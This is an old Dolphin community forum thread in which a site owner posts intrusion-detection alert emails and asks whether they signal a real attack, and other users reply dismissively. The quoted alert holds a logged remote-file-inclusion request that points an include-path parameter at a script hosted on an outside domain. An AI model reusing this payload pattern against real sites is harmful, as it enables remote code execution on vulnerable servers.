Anyone resolved "possible security threat" issue?

I am getting tons of  emails every day saying "possible security attack!"

They all have pretty much the same content:

Total impact: 16
Affected tags: xss, csrf, id, rfe, lfi

Variable: REQUEST.members_mode | Value: top//?sIncPath=
http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt???
Impact: 8 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

Variable: GET.members_mode | Value: top//?sIncPath=
http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt???
Impact: 8 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

REMOTE_ADDR: 74.205.120.218

HTTP_X_FORWARDED_FOR:
HTTP_CLIENT_IP:
SCRIPT_FILENAME: /home/cosmobc/cosmobc.com/index.php
QUERY_STRING: members_mode=top//%3fsIncPath=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt%3f%3f%3f
REQUEST_URI: /index.php?members_mode=top//%



Is it really a security threat or it's an error in the security reporting system?

Has anyone resolved this issue?

Please help!

Quote · 17 Feb 2010

the answer to your question is in the forums :)

Quote · 17 Feb 2010

I think we need a separate forum for the 'Attack' threads.  Anyway, you'll probably find the answer in one of the other 500 threads about this.

Geezus Boonex.... get rid of this PHPIDS piece of crap in the next revision.   Maybe you guys can reintroduce it when it actually works.

My opinions expressed on this site, in no way represent those of Boonex or Boonex employees.
Quote · 17 Feb 2010
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.